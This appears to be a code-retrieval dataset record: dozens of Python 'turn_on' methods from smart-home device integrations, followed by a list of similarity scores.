"async def async_turn_on(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, True)", "def turnOn(self, deviceID):\r\n\r\n return self._performAction(deviceID, _API_DEVICE_ACTION_TURN_ON)", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n self._previous_mic_level = self.device.mic_volume\n self._previous_record_mode = self.device.recording_settings.mode\n await self.device.set_privacy(True, 0, RecordingMode.NEVER)", "def turn_on(self):\n self._lms.query(self._id, 'power', '1')\n self.update_ha_state()", "def turn_on(self) -> None:\n self._state = self._player.turn_on()", "def turn_on(self) -> None:\n self._monoprice.set_power(self._zone_id, True)", "def setOn(self, command):\r\n self.setDriver('ST', 1)", "def turn_on(self):\n self.write(\"OUT1\\n\")", "async def async_turn_on(self, **kwargs):\n self._wrap_device.device.set_duct_zone(self._zone, True)", "def enable(self):\n self.switch.enable()\n self._enabled = True", "def turn_on(self, **kwargs) -> None:\n self.heater.turn_on()", "def turn_on(self, **kwargs):\n if not self.is_on:\n _LOGGER.debug(\"Sending START command to: %s\", self._name)\n self._api.control('START')\n self._mower_status = STATUS_EXECUTING_START\n self.schedule_update_ha_state()", "def turn_on(self, **kwargs):\n self._state = True\n\n # Make initial update\n self.update_switch(self._initial_transition)\n\n self.schedule_update_ha_state()", "def on(self):\n self._set_state(on=True)", "async def async_turn_on(self, **kwargs: Any) -> None:\n if (brightness := kwargs.get(ATTR_BRIGHTNESS)) is not None:\n # set the brightness, which will also turn on/off light\n if brightness == 255:\n brightness = 256 # this will end up as 16 which is max\n self._device.light_brightness = int(brightness / 16)\n else:\n self._device.light_on = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n self.entity_description.on_off_fn(self._valve, True)\n await self._device.push_state()\n self.async_write_ha_state()", "async def async_turn_on(self):\n data_cmd = _command(COMMAND_POWER_ON)\n await self._async_send_command(data_cmd)", "def turn_on(self, **kwargs: Any) -> None:\n _LOGGER.debug(\"Turn on light %s %s\", self._device.ip, kwargs)\n if not self.is_on:\n self._device.power_on = True\n\n if ATTR_BRIGHTNESS in kwargs and self.brightness != kwargs[ATTR_BRIGHTNESS]:\n self._device.brightness = kwargs[ATTR_BRIGHTNESS]\n\n if ATTR_COLOR_TEMP in kwargs and self.color_temp != kwargs[ATTR_COLOR_TEMP]:\n 
color_temp = mired_to_kelvin(kwargs[ATTR_COLOR_TEMP])\n self._device.color_temperature = color_temp", "def turn_on(self, **kwargs):\n self._brightness = 100\n self._state = 'on'\n #self._light.brightness = kwargs.get(ATTR_BRIGHTNESS, 255)\n #self._light.turn_on()\n _LOGGER.info(\"turn_on() is called\")", "def lightning_turnon(self):\n self.turnOn()", "def on(self):\n if not self._is_on:\n self._pwms.enable(self._pin_index, self._frequency)\n self._is_on = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self._switch.async_on()\n self._attr_is_on = True\n self.async_write_ha_state()", "def turn_on(self):\n self._data.homestatus.setroomThermpoint(\n self._data.home_id, self._room_id, STATE_NETATMO_HOME\n )\n self.update_without_throttle = True\n self.schedule_update_ha_state()", "def turn_on(self) -> None:\n\n chromecast = self._get_chromecast()\n if not chromecast.is_idle:\n # Already turned on\n return\n\n if chromecast.app_id is not None:\n # Quit the previous app before starting splash screen or media player\n chromecast.quit_app()\n\n # The only way we can turn the Chromecast is on is by launching an app\n if chromecast.cast_type == pychromecast.const.CAST_TYPE_CHROMECAST:\n app_data = {\"media_id\": CAST_SPLASH, \"media_type\": \"image/png\"}\n quick_play(chromecast, \"default_media_receiver\", app_data)\n else:\n chromecast.start_app(pychromecast.config.APP_MEDIA_RECEIVER)", "def _turn_on(self):\n logger.info(\"Check antenna power\")\n power = yield WaitDBus(self.gsm_device.GetAntennaPower)\n logger.info(\"antenna power is %d\", power)\n if power:\n yield None\n logger.info(\"turn on antenna power\")\n try:\n yield WaitDBus(self.gsm_device.SetAntennaPower, True)\n except dbus.exceptions.DBusException, ex:\n if ex.get_dbus_name() != 'org.freesmartphone.GSM.SIM.AuthFailed':\n raise\n yield self._ask_pin()", "def turnOnSdkMode(self):\n \n command = b\"\\x90\\x01\\x01\"\n #print(\"turnOnSdkMode run, command: \")\n #print(command)\n \n self.sendCommand(command)", "def turn_on(self, **kwargs):\n self.enabled = self.fritz_box.set_call_forwarding(self.uid, 1)", "async def async_turn_on(self) -> None:\n await self._device.leave_standby()", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n self._attr_is_on = await self.relay.set_active(True)\n self.async_write_ha_state()", "def servo_on(self):\n self.logger.info('Setting servo ON')\n self.electronics.move_servo(1)\n self.config['servo']['status'] = 1", "def turn_on(self, **kwargs):\n setattr(self.resource, self.variable, True)", "def on(self):\n\t\trb0 = [0x00]\n\t\trb1 = [0x00, 0x00]\n\t\tattempts = 0\n\n\t\twhile self.state != ON and attempts < MAX_RETRIES:\n\t\t\tself.spi.transfer([0x03], rb0, 1)\t\t## Send the command byte; response will be written to rb0\n\t\t\ttime.sleep(9e-3) \t\t\t\t\t\t## Sleep for 9 ms\n\t\t\tself.spi.transfer([0x00, 0x01], rb1, 2)\t## Send the following 2 bytes; response will be written to rb1\n\t\t\ttime.sleep(0.1)\n\n\t\t\tif rb0[0] < 0: \t\t\t\t\t\t## Account for implicit unsigned-to-signed \n\t\t\t\trb0[0] += 256\t\t\t\t\t## conversion from the transfer operation\n\n\t\t\tattempts += 1\n\t\t\tprint(f\"[{self.__class__.__name__}::on]\", end=' ')\n\t\t\tif rb0[0] == 0xF3 and rb1[0] == 0x03: \t## Ensure response values are as expected\n\t\t\t\tself.state = ON \n\t\t\t\tprint(\"SUCCESS -- device powered on.\")\n\t\t\telse:\n\t\t\t\tif attempts != MAX_RETRIES:\n\t\t\t\t\tprint(f\"Attempt #{attempts} failed -- retrying after delay 
...\")\n\t\t\t\t\ttime.sleep(RETRY_DELAY)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR -- command failed.\")\n\n\t\treturn self.state == ON", "def turn_on(\n self,\n speed: str = None,\n percentage: int = None,\n preset_mode: str = None,\n **kwargs,\n ) -> None:\n self.wink.set_state(True, speed)", "def mark_playfield_active_from_device_action(self):\n self._playfield_switch_hit()", "def power_on(self, port, data_sync=True):\n port = int(port)\n self._validate_port(\"power_on\", port)\n if data_sync:\n self.set_mode(SYNC, port)\n else:\n self.set_mode(CHARGE, port)", "def turnOn(self):\n self.write('E;O1;E;')\n return self.output()", "def switch_on(self, boot_timeout=None, settledown_duration=None,\n simple_switch_mode=False):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def turn_on(self, speed=None, **kwargs):\n self._bond.turnOn(self._deviceId)\n if speed is not None:\n self.set_speed(speed)", "def on(self):\n print(f\"RF {self.name} on\")\n self.status(True)", "async def async_turn_on(self, **kwargs):\n if self._switch_type == \"record_motion\":\n _LOGGER.debug(f\"Turning on Motion Detection for {self._name}\")\n await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_MOTION)\n elif self._switch_type == \"record_always\":\n _LOGGER.debug(\"Turning on Constant Recording\")\n await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_ALWAYS)\n elif self._switch_type == \"record_smart\":\n _LOGGER.debug(\"Turning on SmartDetect Recording\")\n await self.upv.set_camera_recording(\n self._camera_id, TYPE_RECORD_SMARTDETECT\n )\n elif self._switch_type == \"ir_mode\":\n _LOGGER.debug(\"Turning on IR\")\n await self.upv.set_camera_ir(self._camera_id, self._ir_on_cmd)\n elif self._switch_type == \"hdr_mode\":\n _LOGGER.debug(\"Turning on HDR mode\")\n await self.upv.set_camera_hdr_mode(self._camera_id, True)\n elif self._switch_type == \"high_fps\":\n _LOGGER.debug(\"Turning on High FPS mode\")\n await self.upv.set_camera_video_mode_highfps(self._camera_id, True)\n else:\n _LOGGER.debug(\"Changing Status Light to On\")\n await self.upv.set_camera_status_light(self._camera_id, True)\n await self.protect_data.async_refresh(force_camera_update=True)", "async def async_turn_on(self, **kwargs):\n await self.data.set_appliance_state(self.appliance_id, True)\n return True", "async def async_turn_on(self) -> None:\n self._zone.power = True", "def on(self):\n status = self.dev.ctrl_transfer(0x40, 0x01, 0x0001, 0xa0, [])\n if status == 0:\n self.ev.set()\n return (status == 0)", "async def async_turn_on(self, **kwargs):\n if self.entity_description.turn_on_fn is None:\n raise NotImplementedError()\n if not self.is_on:\n await self.entity_description.turn_on_fn(self._wrap_device)", "def turn_on(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Starting all torrents\")\n self._tm_client.api.start_torrents()\n elif self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission on\")\n self._tm_client.api.set_alt_speed_enabled(True)\n self._tm_client.api.update()", "def turn_on(self, **kwargs):\n _LOGGER.debug(\"Turning on Motion Detection \")\n self.data.set_camera_recording(self._camera_id, \"motion\")", "def wifi_on(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE01\")\n time.sleep(100e-3)", "def turn_on(self, **kwargs):\n self.vacuum.start()", "def turnLightingSystemOn():\n dislin.light('ON')", "def set_light_on(self):\r\n self._light = \"ON\"", "async def async_turn_on(self, **kwargs: Any) -> None:\n await 
self.async_publish(\n self._config[CONF_COMMAND_TOPIC],\n self._config[CONF_PAYLOAD_ON],\n self._config[CONF_QOS],\n self._config[CONF_RETAIN],\n self._config[CONF_ENCODING],\n )\n if self._optimistic:\n # Optimistically assume that switch has changed state.\n self._attr_is_on = True\n self.async_write_ha_state()", "async def async_turn_on(self, **kwargs: Any) -> None:\n self._is_on = True\n await self.enable_rain_delay()", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self._set_state(True)", "def switch_on(self,name):\n self.circles[name].switch_on()\n self.cursor.execute(\"\"\"UPDATE sensors_powersensor SET state=1 WHERE target=%s\"\"\", (name,))", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self.entity_description.set_command(self, True)", "def set_light_on(self):\n self._light = \"ON\"", "def turn_on(self, **kwargs):\n self.set_graceful_lock(True)\n self.robot.start_cleaning()", "async def async_set_wifi_led_on(self):\n return", "def turnOn(self):\n self.off = False\n self.turnOnAnimation()", "def switch_on(self):\n if threading.current_thread() != self._blinking_thread:\n self._blinking_thread.unregister(self)\n GPIO.output(self.pin, GPIO.HIGH)", "def test_device_on(self):\n self.ms.add_response({'\\x14081031031E226410\\x0D': 'PA\\x0D'})\n # Network / Device ID\n response = self.upb.on((49, 3))\n self.assertTrue(response)", "async def async_turn_on(\n self,\n speed: Optional[str] = None,\n percentage: Optional[int] = None,\n preset_mode: Optional[str] = None,\n **kwargs: Any,\n ) -> None:\n if preset_mode is not None:\n await self.async_set_preset_mode(preset_mode)\n if preset_mode == PRESET_MODE_WHOOSH:\n self._device.sleep_mode = True\n return\n if percentage is None:\n self._device.fan_on = True\n return\n await self.async_set_percentage(percentage)", "def turn_on(self):\n repeatedFEs = {19200:25, 9600:13, 4800:7, 1200:3, 300:2}\n on_cmd_pre = [0xFE] * repeatedFEs[self.connection.BAUD]\n on_cmd = Command()\n on_cmd.set_num(0x18)\n on_cmd.set_subcmd_num(0x01)\n\n self.connection.send_cmd(on_cmd_pre + on_cmd.render())", "async def async_turn_on(self, **kwargs) -> None:\n self._state = await self._gate.turn_on_light(self._light_id)", "def turn_on(self, **kwargs):\n onValue = str((kwargs.get(ATTR_BRIGHTNESS, int(self._brightness))/255)*100)\n request = requests.post(self._resource,\n data=onValue,\n timeout=10)\n if (request.status_code == 200) or (request.status_code == 201):\n self._state = True\n else:\n _LOGGER.info(\"HTTP Status Code: %s\", request.status_code)\n _LOGGER.error(\"Can't turn on %s. 
Is resource/endpoint offline?\", self._resource)\n\n self.schedule_update_ha_state()", "def enable(self):\n if not self.tm_started:\n for name, tm in self.air_traffic_manager.items():\n logging.debug(\"Starting tm %s\" % name)\n tm.start()\n tm_started = True\n\n logging.debug(\"Enabling switch %s\" % self.name)\n self.disabled = False", "def enable_motor():\n print('Enabling motor')\n start_motor = '{\"id\" : \"Motor1\", \"enabled\" : \"1\"}'\n SERIAL_PARENT.send(start_motor)\n OUTGOING.append(start_motor)", "def enable(self):\n options = self.get_direction_options()\n self.direction = options[0]\n self.state['enabled'] = True\n self.sound_manager.play_loop('std')", "async def async_turn_on(self) -> None:\n if CONF_POWER_COMMAND_TOPIC in self._config:\n mqtt_payload = self._command_templates[CONF_POWER_COMMAND_TEMPLATE](\n self._config[CONF_PAYLOAD_ON]\n )\n await self._publish(CONF_POWER_COMMAND_TOPIC, mqtt_payload)\n return\n # Fall back to default behavior without power command topic\n await super().async_turn_on()", "def turn_on(self, **kwargs) -> None:\n _LOGGER.debug(\n \"SynoDSMSurveillanceHomeModeToggle.turn_on(%s)\",\n self._api.information.serial,\n )\n self._api.surveillance_station.set_home_mode(True)", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self.call_state_change(\"open\")", "async def async_turn_on(self):\n await self.async_mute_volume(False)", "def turn_on(self, **kwargs):\n _LOGGER.error(\"DALI TURN ON\")\n\n self._state = True\n\n if ATTR_BRIGHTNESS in kwargs:\n _LOGGER.error(kwargs[ATTR_BRIGHTNESS])\n\n bri = kwargs[ATTR_BRIGHTNESS]\n\n if bri == 0:\n self._state = False\n else:\n bri = int(bri / 1.5)\n _LOGGER.error(bri)\n\n\n url = self.urlx + '/dimset?bri=' + str(bri)\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n self._dimmer = kwargs[ATTR_BRIGHTNESS]\n\n else:\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n self._dimmer = 255\n self._state = state == 'on'" ]
[ "0.8281669", "0.7963511", "0.7818252", "0.7757262", "0.7712496", "0.7595535", "0.7588195", "0.7578901", "0.751521", "0.7514764", "0.7510081", "0.75018376", "0.74641955", "0.74501693", "0.7437987", "0.7409389", "0.7357094", "0.73516375", "0.73505986", "0.73295283", "0.7277296", "0.72177243", "0.71967274", "0.7192182", "0.7173079", "0.7159582", "0.71592605", "0.71592605", "0.7153755", "0.7136868", "0.7087433", "0.70812875", "0.705977", "0.7050677", "0.7048706", "0.7028616", "0.69977933", "0.69531614", "0.6948858", "0.6926658", "0.68842614", "0.68735296", "0.6869603", "0.6857102", "0.6856778", "0.6851375", "0.68471503", "0.68368435", "0.68358994", "0.6796191", "0.6783157", "0.6775177", "0.6773509", "0.6755645", "0.673851", "0.67333585", "0.67048275", "0.670245", "0.6685518", "0.66847533", "0.6678895", "0.66778815", "0.6677662", "0.66712916", "0.66677094", "0.6660014", "0.66347116", "0.66248816", "0.66185164", "0.65960145", "0.6585551", "0.65837806", "0.6574945", "0.65724915", "0.6566501", "0.6553124", "0.65378517", "0.65368927", "0.65264386", "0.65048814", "0.6495898", "0.6495671", "0.6485879", "0.6475109", "0.64673036", "0.64533794", "0.64509684", "0.6437297", "0.6428574", "0.6428406", "0.6406556", "0.63966286", "0.63888717", "0.6380407", "0.63798463", "0.6374436", "0.63694054", "0.6357835", "0.63563496", "0.63546944" ]
0.6726692
56
Turn the device off.
async def async_turn_off(self, **kwargs): if self._switch_type == "ir_mode": _LOGGER.debug("Turning off IR") await self.upv.set_camera_ir(self._camera_id, self._ir_off_cmd) else: _LOGGER.debug("Turning off Recording") await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_NEVER) await self.coordinator.async_request_refresh()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def turn_off(self):\n self._state = False\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":0 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'): \n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":0 }', 5)", "def turn_off(self, **kwargs):\n self.smartplug.turn_off()", "def off(config: dict):\n switch_device(config, config[\"inching\"], \"off\")", "def turn_off(self, **kwargs):\n set_sonoff_state(self._host, \"off\")\n self._state = False", "def turn_off(self, **kwargs: Any) -> None:\n self._device.power_on = False\n _LOGGER.debug(\"Turn off light %s\", self._device.ip)", "def turn_off(self):\n self.handleCommand(1)\n self._state = STATE_OFF", "def turn_off(self, **kwargs):\n self._is_on = False", "def switch_off(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def turnOff(self):\n self.write(\"E;O0;E;\")\n return self.output()", "def turn_off(self):\n GPIO.output(self.gpio, False) # turn off light", "def turn_off(self, **kwargs: Any) -> None:\n with self._wemo_call_wrapper(\"turn off\"):\n self.wemo.off()", "def setOff(self, command):\r\n self.setDriver('ST', 0)", "def _turn_off(self):\n self._turn_display('OFF')", "def off(self):\n self._set_state(on=False)", "def turn_off(self, **kwargs) -> None:\n self.wink.set_state(False)", "def turn_off(self, **kwargs: Any) -> None:\n if (\n DPCODE_LIGHT in self.tuya_device.status\n and DPCODE_SWITCH not in self.tuya_device.status\n ):\n commands = [{\"code\": DPCODE_LIGHT, \"value\": False}]\n else:\n commands = [{\"code\": DPCODE_SWITCH, \"value\": False}]\n self._send_command(commands)", "def turn_off(self) -> None:\n self._monoprice.set_power(self._zone_id, False)", "def turn_off(self):\n print(\"Turning the lights off\")\n self.led.all_off()\n self.client.publish(STATE_TOPIC, OFF) #publish", "def turn_off(self, **kwargs) -> None:\n self._device.writeCharacteristic(self._handle, b'\\x01', True)\n self._state = False\n self.schedule_update_ha_state()", "def turn_off(self):\n self._interrupt_flash()\n if self.on:\n GPIO.output(self.pin, GPIO.LOW)\n self.on = False", "def turn_off(self, **kwargs: Any) -> None:\n self._set_light(OFF_STATE)", "def turn_off(self, **kwargs):\n self._send_command(\"turn_off\")", "def turn_off(self):\n self._state = False\n self.write_state(bytes([1]))\n self.schedule_update_ha_state()", "async def async_turn_off(self, **kwargs: Any) -> None:\n self._device.light_on = False", "def off(self):\n print(f\"RF {self.name} off\")\n self.status(False)", "async def async_turn_off(self, **kwargs: Any) -> None:\n self._device.fan_on = False", "async def async_turn_off(self, **kwargs: Any) -> None:\n await self._client.turn_off(self._device_port)", "def turn_off(self, **kwargs):\n _LOGGER.error(\"DALI TURN OFF\")\n self._state = False\n\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n\n self._dimmer = 0\n\n self._state = state == 'on'", "def turn_off(self, **kwargs: Any) -> None:\n self._light.turn_off()", "def off_switch(self):\n self._switch_callback = None", "def turn_off(self):\n self.write(\"OUT0\\n\")", "def turn_off(self, **kwargs):\n 
self.vacuum.stop()\n self.vacuum.home()", "def turn_off(self, **kwargs):\n #self._light.turn_off()\n self._brightness = 0\n self._state = 'off'\n _LOGGER.info(\"turn_off() is called\")", "def turn_off(self):\n self.robot.stop_simulation()", "def off(self):\n if self._is_on:\n self._pwms.disable(self._pin_index)\n self._is_on = False", "def turn_off(self, **kwargs):\n self._client.set_brightness(self._id, 0)", "def turn_off(self, **kwargs):\n self.robot.pause_cleaning()\n time.sleep(1)\n self.robot.send_to_base()", "def turn_off(self):\n self.set_pin(0, -1)\n self.set_pin(1, -1)\n self.set_pin(2, -1)", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "def turn_off(self, **kwargs):\n self._is_on = False\n self.schedule_update_ha_state()\n self.hass.data[ZIGATE_DOMAIN].action_onoff(self._device.addr,\n self._endpoint,\n 0)", "async def async_turn_off(self, **kwargs):\n self._wrap_device.device.set_duct_zone(self._zone, False)", "def turn_off(self) -> None:\n self._media_title = None\n self._state = self._player.turn_off()", "def lightning_turnoff(self):\n self.turnOff()", "def turnOff(self):\n self.off = True\n self.turnOffAnimation()", "def turnLightingSystemOff():\n dislin.light('OFF')", "async def async_turn_off(self, **kwargs):\n try:\n if await self._api.set_relay_state(self._dev_id, \"off\"):\n self._is_on = False\n self.async_write_ha_state()\n except Smile.PlugwiseError:\n _LOGGER.error(\"Error while communicating to device\")", "def off(self):\n self.state = \"OFF\"\n logger.info(\"Turning off %s lamp at %s port %s plug %s\" % (self.name,\n self.host,\n self.port,\n self.plug))\n return self.send_cmd(\"pset %s 0\" % self.plug)", "def turn_off(self, **kwargs):\n _LOGGER.debug(\"Turning off Motion Detection \")\n self.data.set_camera_recording(self._camera_id, \"never\")", "def turn_off(self, **kwargs):\n self._attributes['current_speed'] = SPEED_OFF\n self._bond.turnOff(self._deviceId)", "def turn_off(self, **kwargs):\n if self.is_on:\n _LOGGER.debug(\"Sending STOP command to: %s\", self._name)\n self._api.control('STOP')\n self._mower_status = STATUS_EXECUTING_STOP\n self.schedule_update_ha_state()", "def systemOff():\n # Updated 11/19/16\n I2C.write_byte_data(Valve_bus, pinOut_O, 0x00 )\n I2C.write_byte_data(Pump_Mag_bus, pinOut_O, 0x00)", "async def async_turn_off(self):\n path = \"/interface\"\n param = \"default-name\"\n if \"-\" in self._data[\"port-mac-address\"]:\n param = \"name\"\n value = self._data[param]\n mod_param = \"disabled\"\n mod_value = True\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n\n if self._data[\"poe-out\"] == \"auto-on\":\n path = \"/interface/ethernet\"\n self._ctrl.set_value(path, param, value, \"poe-out\", \"off\")\n\n await self._ctrl.async_update()", "def stop_device(self):\n\n self.state = 'stopped'", "def turn_off(self, **kwargs):\n self.heater.turn_off()", "def turn_off(self, **kwargs):\n setattr(self.resource, self.variable, False)", "def ToggleOff(self):\n for s in self.sensors:\n self.gSetpt[s.GetID()].Disable()\n\n self.top_sizer.Layout()\n print(\"Toggle off\")", "def power_off(self):\n LOG.info('Powering off system')\n self._run_shutdown_command('poweroff')", "def wifi_off(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE00\")\n time.sleep(100e-3)", "def turn_off(self, **kwargs):\n self._state = False\n 
self.schedule_update_ha_state()\n self._hs_color = None\n self._attributes[\"hs_color\"] = self._hs_color\n self._attributes[\"brightness\"] = None", "def servo_off(self):\n self.logger.info('Setting servo OFF')\n self.electronics.move_servo(0)\n self.config['servo']['status'] = 0", "def switch_off(self,name):\n self.circles[name].switch_off()\n self.cursor.execute(\"\"\"UPDATE sensors_powersensor SET state=0 WHERE target=%s\"\"\", (name,))", "def set_light_off(self):\r\n self._light = \"OFF\"", "def set_light_off(self):\n self._light = \"OFF\"", "def off(self):\n return self.device.off(self.station_number)", "def turn_off(self) -> None:\n self._get_chromecast().quit_app()", "async def async_turn_off(self) -> None:\n await self._device.enter_standby()", "def off(self):\n status = self.dev.ctrl_transfer(0x40, 0x01, 0x0001, 0x20, [])\n if status == 0:\n self.ev.clear()\n return (status == 0)", "def turn_off(self, **kwargs):\n if (CommandSwitch._switch(self._command_off) and\n not self._command_state):\n self._state = False\n self.schedule_update_ha_state()", "async def async_turn_off(self) -> None:\n self._zone.power = False", "async def async_turn_off(self, **kwargs: Any) -> None:\n await self._switch.async_off()\n self._attr_is_on = False\n self.async_write_ha_state()", "def switch_off(self):\n if threading.current_thread() != self._blinking_thread:\n self._blinking_thread.unregister(self)\n GPIO.output(self.pin, GPIO.LOW)", "async def async_turn_off(self, **kwargs):\n await self._endpoint.on_off.off()\n self._state = False", "def turnOff(self, deviceID):\r\n \r\n return self._performAction(deviceID, _API_DEVICE_ACTION_TURN_OFF)", "def power_off(self, port):\n port = int(port)\n self._validate_port(\"power_off\", port)\n self.set_mode(OFF, port)", "def turn_off_modem(self):\n if self.is_power_on():\n self._logger.debug(\"Switching modem off...\")\n self.set_pin()\n GPIO.cleanup()\n # give modem some time to log out\n time.sleep(5)\n else:\n self._logger.debug(\"GSM modem is already OFF...\")", "def turn_off(self, **kwargs: Any) -> None:\n self._light.turn_off()\n if self._brightness:\n self._last_brightness = self._brightness", "async def async_turn_off(self, **kwargs):\n try:\n state_off = await self._api.set_relay_state(\n self._dev_id, self._members, \"off\"\n )\n if state_off:\n self._is_on = False\n self.async_write_ha_state()\n except PlugwiseException:\n _LOGGER.error(\"Error while communicating to device\")", "def sm_output_off(self):\n self.sm.output_off()", "def turn_off_motors():\n MOTOR_HAT.release_motors()", "def turn_off(self):\n if self._module_type == NA_VALVE:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id,\n self._room_id,\n STATE_NETATMO_MANUAL,\n DEFAULT_MIN_TEMP,\n )\n elif self.hvac_mode != HVAC_MODE_OFF:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id, self._room_id, STATE_NETATMO_OFF\n )\n self.update_without_throttle = True\n self.schedule_update_ha_state()", "def off(self) -> bool:\n off_cmd = HomeAssistantPlugin.service_map[self.domain.lower()][\"off\"]\n return self.send(off_cmd)", "def turn_off(self, **kwargs):\n request = requests.post(self._resource, data=\"0\", timeout=10)\n if (request.status_code == 200) or (request.status_code == 201):\n self._state = False\n else:\n _LOGGER.error(\"Can't turn off %s. 
Is resource/endpoint offline?\",\n self._resource)\n\n self.schedule_update_ha_state()", "def servo_off(self):\n msg = b'\\x0C\\x00'\n self.__bt.write(msg)", "async def async_turn_off(self):\n data_cmd = _command(COMMAND_POWER_OFF)\n await self._async_send_command(data_cmd)", "def disable(self):\n self.direction = None # remove direction\n self.state['enabled'] = False # reset states\n self.state['return'] = False\n self.return_path = None # remove path\n if self.state['blue']:\n self.stop_blue_state(resume_audio=False)\n self.image, _ = self.norm_images.get_image() # reset image\n self.sound_manager.stop()", "def turn_off(self, **kwargs):\n self.enabled = self.fritz_box.set_call_forwarding(self.uid, 0)", "def doShutdownDevice(self):\n if self.device is not None:\n self.device.reset()\n self.device = None", "def off_all(self):\n self._set_status(\"off\", \"11111111\")", "def turn_output_off(self):\n self.instr.write('RF0')\n time.sleep(self.sleep_time)", "def off(self):", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n extra_state = self.extra_state_attributes or {}\n prev_mic = extra_state.get(ATTR_PREV_MIC, self._previous_mic_level)\n prev_record = extra_state.get(ATTR_PREV_RECORD, self._previous_record_mode)\n await self.device.set_privacy(False, prev_mic, prev_record)", "def resetDeviceStates(self):", "def off(self):\n self._make_event(0)", "def power_off(self):\n return self.inst.write(':OUTP OFF')", "async def async_turn_off(self, **kwargs: Any) -> None:\n self._attr_is_on = await self.relay.set_active(False)\n self.async_write_ha_state()", "async def async_set_wifi_led_off(self):\n return", "def turn_off(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Stopping all torrents\")\n self._tm_client.api.stop_torrents()\n if self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission off\")\n self._tm_client.api.set_alt_speed_enabled(False)\n self._tm_client.api.update()", "def stop(self):\n self.turnOffMotors()", "def _turn_off_light(self, light):\n self.bridge.set_light(light, 'on', False)\n return True" ]
[ "0.8548868", "0.8254268", "0.8161882", "0.8142198", "0.8119367", "0.807117", "0.7936932", "0.7904594", "0.7890579", "0.78688365", "0.7838398", "0.7834393", "0.78312963", "0.77885693", "0.77876323", "0.7755004", "0.77309066", "0.77295303", "0.7704694", "0.76726454", "0.76484203", "0.76282126", "0.76206577", "0.7614615", "0.7594031", "0.7586658", "0.75629306", "0.7555474", "0.75449514", "0.74997354", "0.74818355", "0.74550915", "0.7448442", "0.74359214", "0.74267596", "0.74171984", "0.741081", "0.7408898", "0.73999923", "0.73999923", "0.73996896", "0.7398373", "0.7394856", "0.7393185", "0.7349214", "0.73279846", "0.7325014", "0.7320183", "0.73091954", "0.7295666", "0.7276982", "0.72758347", "0.7253707", "0.7248973", "0.7246335", "0.7240697", "0.7234233", "0.72154397", "0.7210906", "0.7204448", "0.7203815", "0.72009724", "0.7200068", "0.7188922", "0.7187006", "0.71790576", "0.7175677", "0.7146277", "0.7110458", "0.7101454", "0.7100556", "0.7082088", "0.70810884", "0.70716727", "0.706673", "0.70462906", "0.7034192", "0.70336556", "0.70305085", "0.7027966", "0.7004749", "0.6978105", "0.69653124", "0.6944579", "0.6926702", "0.6920078", "0.69175893", "0.6915505", "0.69128543", "0.691008", "0.6908632", "0.69043756", "0.6900242", "0.6890506", "0.68879473", "0.68783504", "0.6874964", "0.68602836", "0.6857135", "0.6849824" ]
0.69212335
85
Given an Item Number and a library data dict, return the name of the library it's found in, and the symbol name
def findSymbolByItemnum(itemnum, libs_dict):
    e_itemnum = re.escape(itemnum)
    for libname, dat in libs_dict.items():
        m = re.search(r'^DEF ([^ ]*) .*(?:\n[^\$].+)+\nF ?\d+ "'+e_itemnum+r'".* "Item Number"\n', dat, re.MULTILINE)
        try:
            symname = m.group(1)
            return libname, symname
        except:
            continue
    return None, None
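A minimal usage sketch for the function above. Everything in it is assumed for illustration: the library text is a made-up, KiCad-style symbol definition whose field line carries the "Item Number" name the regex looks for, the item number "IT-0042" is invented, and `import re` must be in scope alongside the function.

import re  # required by findSymbolByItemnum

# Hypothetical library data: library name -> raw symbol-library text.
libs = {
    "passives": (
        'EESchema-LIBRARY Version 2.4\n'
        'DEF R_0603 R 0 40 Y N 1 F N\n'
        'F0 "R" 0 100 50 H V C CNN\n'
        'F2 "IT-0042" 0 -200 50 H I C CNN "Item Number"\n'
        'DRAW\n'
        'ENDDRAW\n'
        'ENDDEF\n'
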